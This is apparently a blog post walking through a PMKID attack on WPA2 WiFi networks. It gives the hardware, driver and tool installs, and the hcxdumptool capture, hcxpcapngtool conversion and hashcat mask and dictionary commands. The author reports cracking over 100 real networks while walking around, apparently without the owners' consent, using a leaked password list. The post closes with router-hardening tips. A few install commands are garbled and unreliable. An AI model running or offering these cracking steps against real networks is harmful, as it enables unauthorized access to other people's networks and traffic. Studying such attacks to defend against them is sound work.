PMKID Attack

Saw an article by Cyberark saying, “in a couple of hours and with approximately $50, your neighbor or a malicious actor can compromise your privacy and much more if you don’t have a strong password”. I wanted to know if I only had to spend ~$50 to crack WiFi.

This attack was discovered accidentally by Atom in 2018, “while looking for new ways to attack the new WPA3 security standard. WPA3 will be much harder to attack because of its modern key establishment protocol called “Simultaneous Authentication of Equals” (SAE).

The main difference from existing attacks is that in this attack, capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame.

At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers).

The main advantages of this attack are as follow:

  • No more regular users required — because the attacker directly communicates with the AP (aka “client-less” attack)
  • No more waiting for a complete 4-way handshake between the regular user and the AP
  • No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results)
  • No more eventual invalid passwords sent by the regular user
  • No more lost EAPOL frames when the regular user or the AP is too far away from the attacker
  • No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds)
  • No more special output format (pcap, hccapx, etc.) — final data will appear as regular hex encoded string”.
Flow of Calculating PMKID hash and PMK

For PMKID attack to work we need to generate a PMK driven from SSID (the network name) and the Passphrase; then we generate a PMKID driven from the PMK we generated, the AP MAC address, and the client MAC address. So let us see where we can find those:

PMK Calculation
  • ​​PMK(Pairwise Master Key): What we are searching for, generated above. In WPA2 personal, the PMK is the PSK.
  • Passphrase: The WiFi password
  • SSID: The name of the network. It is freely available at the router beacons
  • 4096 — Number of PBKDF2 iterations (OWASP recommends PBKDF2-HMAC-SHA1: 720,000 iterations)
  • PBKDF2: Password-Based Key Derivation Function 2 makes it harder for someone to guess your account password through a brute-force attack.
PMKID Calculation
  • PMKID= Pairwise Master Key Identifier
  • “PMK Name” — Static string for all PKMIDs.
  • MAC_AP= Access Point’s MAC address — This address can be found in any frame send by the router
  • MAC_STA: The client’s Mac address can be found in any frame sent by the client’s computer. It can moreover be found in the output of ifconfig\ip a commands.

Now we know how a PMKID is being generated, and we can continue to the sniffing and cracking phases. Before sniffing we need to set up our environment.

Hardware

  • Macbook Air 2011 $85
  • ALFA AWUS036ACH $65

Software

  • Kali Linux
  • Hashcat
  • Hcxdumptool
  • Hcxpcapngtool

Alfa router did not work out of box. Had to install drivers.

$ sudo apt 
$ update sudo
$ apt upgrade -y sudo
$ apt dist-upgrade -y
$ sudo reboot now
$ sudo apt update
$ sudo apt install realtek-rtl88xxau-dkms
$ sudo apt install dkms
$ git clone https://github.com/aircrack-ng/rtl8812au
$ cd rtl8812au/
$ make
$ sudo make install

Next installed hcxdumptool and hcxtools

$ git clone https://github.com/ZerBea/hcxdumptool.git
$ cd hcxdumptool
$ sudo apt-get install libcurl4-openssl-dev libssl-dev pkg-config
$ make
$ make install (as super user)
$ git clone https://github.com/ZerBea/hcxtools.git
$ cd hcxtools
$ make
$ make install (as super user)

Stop all services that are accessing the WLAN device (e.g .: NetworManager and wpa_supplicant.service)

$ sudo systemctl stop wpa_supplicant
$ sudo service NetworkManager stop

Packet Sniffing

$ sudo hcxdumptool -i interface -o dumpfile.pcapng --active_beacon --enable_status=15

When I reached 500 SSID’s, I decided to quit California weather to hot to be walking around.

Convert PCAP into hash file

Had to convert the data to a format Hashcat can read. Used hcxpcapngtool to convert PCAP into hash file.

$ sudo hcxpcapngtool -o hash.hc22000 -E wordlist dumpfile.pcapng
Example of hashfile line

Now we can start cracking passwords. The Mac was not able to use Hashcat in 2200 mode so I used Hashcat on my PC with a 2080TI.

Bruteforce Attack

Here is my Hashcat command that tried all the possible cellphone numbers combinations in California [the California area code is 408].

Mask Attack

$ hashcat -m 22000 hash.hc22000 -a 3 408?d?d?d?d?d?d?d
  • ?l = abcdefghijklmnopqrstuvwxyz
  • ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
  • ?d = 0123456789
  • ?h = 0123456789abcdef
  • ?H = 0123456789ABCDEF
  • ?s = «space»!”#$%&’()*+,-./:;<=>?@[\]^_`{|}~
  • ?a = ?l?u?d?s
  • ?b = 0x00–0xff

If I were to use ?l?l?l?l?l?l?l?l (8 lower case letters) it would take my hardware 1 year to crack.

Dictionary Attack

Next I did a dictionary attack with rockyou2021.txt. rockyou2021.txt is a compilation of dictionaries, breached words, and probable passwords, released by kys234 on RaidForums.

$ hashcat -m 22000 hash.hc22000 rockyou2021.txt

Conclusion

In total cracked more than 100 WiFi networks around 25% of sample size. Not all routers support roaming features and are, therefore, not vulnerable to the PMKID attack.

The WiFi password is what prevents hackers and others from accessing your home wireless network, stealing your bandwidth and even viewing your traffic. You probably want a password that’s easy enough to give to guests who want to use your wireless network, but an easy and weak password can be easily cracked by hackers. A couple, but not all things an attacker can do

  1. Can capture traffic moving in and out of your system.
  2. MITM
  3. If you dont have all the recent updates and patches, then attacker might be able to find and exploit a vulnerability. This will allow them to take control over your system or be able to put a keylogger into the system.
  4. Anonymously perform some illegal hacking activity from your network and then the authorities will track back to you.

How to prevent?

  1. Choose a complex password. A strong password should include at least one lower case character, one upper case character, one symbol, one digit. It should be at least 10 characters long. It should be easily remembered and hard to anticipate. Bad example: Summer$021
  2. Change the default username and password of your router.
  3. Update your router firmware version.
  4. Disable weak encryption protocols (as WAP or WAP1).
  5. Disable WPS.

References

  1. https://www.youtube.com/watch?v=hEXwOkyYNL0
  2. https://www.cyberark.com/resources/threat-research-blog/cracking-wifi-at-scale-with-one-simple-trick
  3. https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2
  4. https://hashcat.net/forum/thread-7717.html
  5. https://chris.partridge.tech/2021/rockyou2021.txt-a-short-summary/#download

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store